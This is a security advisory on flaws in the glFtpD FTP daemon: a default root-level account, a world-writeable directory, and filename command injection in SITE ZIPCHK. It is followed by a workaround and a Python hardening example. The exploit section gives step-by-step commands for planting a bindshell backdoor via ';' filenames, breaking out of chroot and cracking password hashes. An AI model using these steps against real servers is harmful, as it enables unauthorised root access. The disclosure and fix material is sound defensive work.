glFtpD is an FTP daemon available from www.glftpd.org. Although it's a beta release, it is in wide use across the Internet.
glFtpD is a somewhat attractive choice for many non-technically minded people since it is simple to install and runs fine on the default configuration. It runs on Linux, FreeBSD and Solaris.
glFtpD is also quite packed with "features" such as the ability to script add-ons in tcl, and more. With such a large amount of features it appears that the attention paid to security has suffered somewhat during development.
1) Default "glftpd" account:
By default glFtpD installs a user account on your new FTP server called "glftpd"; the password of this user is predictably "glftpd".
This default user also has a UID of 0. This means that users FTP'ing to your machine have uid == 0 (meaning, root). It is not a very good idea to leave it that way.
2) World writeable site directory:
By default, your new FTP server's ~/site directory is world writeable.
3) SITE ZIPCHK command:
The SITE command ZIPCHK can be used to check the validity of a ZIP file on the server. Presumably this is so you can make sure the ZIP file you are about to download is valid and free from error. The way this works is as follows:
ftp> quote SITE ZIPCHK XXXXX.ZIP
glFtpD then runs a shell script with XXXXX.ZIP as argv[1] (or argv[2]), which calls /bin/unzip.
If a user is able to create a filename with ";" characters in the name, they can execute arbitrary code on the remote server with the privileges of the server.
Exploit Information:
1) & 2) are traditionally bad and the exploit is obvious.
3) This is quite simple. A user need only have some place to upload files:
- You will need to build some kind of backdoor to allow you access, using bindshell.c
$ gcc bindshell.c -o b -static
- Create an empty file called " ; bash blah;"
- Create an empty file called " ; unzip blah;"
$ > ";bash blah;"
- Create a script called "blah" :
$ cat > blah
#!/bin/bash
./b &
^D
- "ZIP" these files up.
$ zip blah.zip blah b
- Login to your FTP server. Now upload your files:
ftp> put blah.zip
ftp> put " ; bash blah;"
ftp> put " ; unzip blah.zip;"
- Because glFtpD attempts to convert spaces in filenames to underscores, you'll need to rename them back.
- glFtpD will spit out an error message. Ignore it. Now telnet to the port defined within bindshell.c (you have now effectively compromised the server).
- Once you're inside, if you attacked the glftpd account (or any uid = 0 account), you may use the simple chroot() breaking techniques ( http://www.suid.kg/source/breakchroot.c ) to have run of the entire box.
- If you do not have a uid == 0 account, you'll probably be in a chroot environment and you don't really have a way out except to:
- check /etc/passwd (really $GLFTPDHOME/etc/passwd)
- Crack a uid == 0 passwd, maybe the glftpd account is still in there
- Use your imagination.
Workaround:
An easy fix is to override the command in glftpd.conf (or equivalent) with something like:
site_cmd ZIPCHK TEXT /ftp-data/misc/disabled
which causes a text file to be displayed rather than a command executed.
The fix (official one) from glFtpD developers GreyLine and Usurper is to add:
"path-filter * /ftp-data/misc/pathmsg ^[-A-Za-z0-9_.()[:space:]]*$ ^\.^-"
To the config file.
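The filename policy behind the official fix, shown as an added Python example (not glFtpD's own code): the vulnerable shell-string construction from the ZIPCHK description beside a hardened version that applies the path-filter allow-list and hands the name to unzip as a separate argv element so no shell ever parses it. Assumptions: the POSIX class [:space:] is translated to Python's \s, and the trailing ^\. and ^- patterns of the filter are read as deny-rules for names beginning with a dot or a dash.

```python
import re
import subprocess
from typing import List

# Allow-list taken from the advisory's official path-filter; the POSIX
# bracket class [:space:] is rendered as Python's \s (assumption).
ALLOWED_NAME = re.compile(r"^[-A-Za-z0-9_.()\s]*$")

# The trailing "^\." and "^-" of the filter are read here as extra
# deny-patterns for names starting with a dot or a dash (assumption).
DENIED_PREFIX = re.compile(r"^[.-]")


def filename_allowed(name: str) -> bool:
    """Return True if an upload name passes the path-filter policy.
    A ';' (the character the advisory abuses) is outside the allow-list."""
    if not name:
        return False
    return bool(ALLOWED_NAME.match(name)) and not DENIED_PREFIX.match(name)


def vulnerable_zipchk_command(name: str) -> str:
    """The 'before': the filename is pasted into a shell command line, so a
    name such as ' ; unzip blah.zip;' becomes a second shell command."""
    return "/bin/unzip -t " + name


def zipchk_argv(name: str) -> List[str]:
    """The hardened form: validate first, then build an argv list so the
    shell never sees the name; '--' stops unzip reading it as an option."""
    if not filename_allowed(name):
        raise ValueError("filename rejected by path-filter")
    return ["/bin/unzip", "-t", "--", name]


def run_zipchk(name: str) -> int:
    """Run the integrity check without shell=True; returns unzip's exit code."""
    return subprocess.run(zipchk_argv(name), check=False).returncode
```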